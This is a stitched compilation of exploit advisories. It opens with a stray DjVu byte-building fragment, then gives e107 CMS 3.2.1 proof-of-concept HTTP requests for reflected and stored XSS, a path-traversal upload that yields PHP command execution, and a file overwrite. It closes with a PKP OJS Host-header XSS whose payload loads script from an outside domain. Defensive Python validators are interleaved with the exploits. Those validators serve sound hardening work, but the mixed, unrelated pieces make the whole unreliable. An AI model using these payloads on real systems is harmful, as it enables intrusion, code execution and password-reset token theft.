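    info = b"\x00\x01\x00\x01\x18\x00\x2c\x00\x16\x01"  # constructed INFO field bytes
    body = b"DJVU" + chunk(b"INFO", info) + chunk(annotation_chunk, annotation)
    return DJVU_MAGIC + struct.pack(">I", len(body)) + body


# Constructed JPEG start (SOI + APP1 marker); a real EXIF segment would follow.
SAMPLE_JPEG_PREFIX = b"\xff\xd8\xff\xe1"
```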
# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Reflected - Via adding comment (Authenticated)
# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' >
[...]
The user clicks to comment on a news item, types any character in the comment field, and then clicks elsewhere outside the field, which fires the injected onchange handler.
### Upload restriction bypass (Authenticated [Admin]) + Stored XSS
An account with administrative privileges can bypass the image upload restriction (stored XSS via an .svg file).
Image -> Media Manager -> Upload a file -> Image/File URL
The admin can upload an SVG from localhost -> http://127.0.0.1:8070/xxe_svg2.svg
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]
### Upload restriction bypass (Authenticated [Admin]) + RCE
Upload and execute a .PHP file.
The attacker must upload the file to ../../../ (the parent directory), because, for whatever reason, the application only executes the PHP code when the file is placed in the parent directory.
Media Manager -> Media Upload/Import -> From a remote location
# POC
Request
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
The uploaded PHP file can be seen on the server side.
cmd.php file source:
<?php
system('whoami');
?>
### Upload restriction bypass (Authenticated [Admin]) + Server file overwrite
An attacker can overwrite a file such as top.php in the main directory of the web application.
The original top.php on the server was inspected first; the file can then be overwritten via the following upload functionality:
Media Manager -> Media Upload/Import -> From a remote location
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
The content of top.php was tampered with.
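All three admin-side issues above stem from the same two gaps in the media import: the caption is used as the stored file name without stripping path separators, and the fetched file's type is judged by its extension or URL alone. As an added example (not e107's own code), this Python check shows the validation a hardened import would apply: the caption reduced to a single path component, an allow-list of image extensions, and the body sniffed for a matching image signature. The sample bytes are constructed.

```python
import os
import re
from urllib.parse import unquote

# Image types the media manager should accept. SVG is deliberately absent because it can
# carry script (the stored-XSS case above) and PHP is never an image.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,100}$")


class UploadRejected(ValueError):
    pass


def safe_media_filename(caption, remote_url, content):
    """Return the name to store under the media directory, or raise UploadRejected.

    caption    -- the user-supplied upload_caption form field, URL-encoded as received
    remote_url -- the upload_url form field; only its last path segment is consulted
    content    -- the bytes fetched from remote_url
    """
    # 1. Collapse the caption to one path component: '..', '/' and '\' cannot survive basename().
    name = os.path.basename(unquote(caption).replace("\\", "/")).strip()
    if name in ("", ".", ".."):
        name = os.path.basename(unquote(remote_url).split("?")[0])
    if not _SAFE_NAME.match(name):
        raise UploadRejected(f"unsafe file name {name!r}")
    # 2. Extension allow-list (lower-cased, last suffix only).
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    # 3. Content sniffing: the bytes must start with a signature for that extension,
    #    and must not smuggle server- or client-side code behind a valid header.
    if not any(content.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected(f"content does not look like {ext}")
    if b"<?php" in content or b"<script" in content.lower():
        raise UploadRejected("embedded code detected in image body")
    return name


def check_upload(caption, remote_url, content):
    """Non-raising wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, safe_media_filename(caption, remote_url, content)
    except UploadRejected as exc:
        return False, str(exc)
```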
# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Date: 31/01/2022
# Exploit Author: Hemant Kashyap
# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
# Version: PKP Open Journals System 2.4.8 >= 3.3
# Tested on: All OS
# CVE : CVE-2022-24181
# References: https://youtu.be/v8-9evO2oVg
XSS via Host header injection, leading to theft of another user's password reset token. Steps to reproduce:
1) Go to this site: https://who's-using-ojs-software.com
2) Capture the request in Burp and send it to Repeater.
3) Add this header after the Host header: X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
4) Click Send, then right-click the request, choose "Show response in browser", and copy the request.
5) Paste this request into the browser, and you will see the XSS pop-up.
Mitigation: Update to a newer version.
This vulnerability in the PKP Open Journal Systems software affects versions 2.4.8 through 3.3.8; all are vulnerable to XSS via Host header injection and to password reset token theft.
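The root cause described above is that the application builds absolute links, including the password reset link, from the request's Host or X-Forwarded-Host header instead of from configuration. As an added example (not OJS code; the reset path and host names are placeholders), this Python snippet shows the two-part fix: accept only syntactically valid, allow-listed hosts, and derive outbound links from a configured canonical base.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# The site's canonical public origin comes from configuration, never from the request.
CANONICAL_BASE = "https://journal.example"  # placeholder value
# Hosts that may legitimately appear in Host / X-Forwarded-Host (e.g. behind a reverse proxy).
TRUSTED_HOSTS = {"journal.example", "www.journal.example"}
# RFC 1123-style host name, optionally followed by a port.
_HOSTNAME = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*(?::\d{1,5})?$")


def effective_host(headers):
    """Host the request claims; the first X-Forwarded-Host value wins over Host, as behind a proxy."""
    raw = headers.get("X-Forwarded-Host") or headers.get("Host") or ""
    return raw.split(",")[0].strip()


def host_is_trusted(headers, trusted=TRUSTED_HOSTS):
    """True only if the claimed host is syntactically a host name and on the trusted list."""
    host = effective_host(headers).lower()
    if not _HOSTNAME.match(host):
        return False  # e.g. the quote-and-angle-bracket payload from the advisory
    return host.split(":")[0] in trusted


def build_reset_link(token, headers, canonical_base=CANONICAL_BASE):
    """Password-reset URL built from configuration; the request's host never reaches the link."""
    if not host_is_trusted(headers):
        raise ValueError("untrusted Host/X-Forwarded-Host; refusing to build reset link")
    scheme, netloc, path, _, _ = urlsplit(canonical_base)
    # "/login/resetPassword" is an illustrative route, not necessarily the application's real one.
    return urlunsplit((scheme, netloc, path.rstrip("/") + "/login/resetPassword", f"token={token}", ""))


# Constructed header sets: a normal request and an injected X-Forwarded-Host of the advisory's shape.
NORMAL_HEADERS = {"Host": "journal.example"}
INJECTED_HEADERS = {"Host": "journal.example",
                    "X-Forwarded-Host": 'foo"><script src=//attacker.example/2.js></script><x=".com'}
```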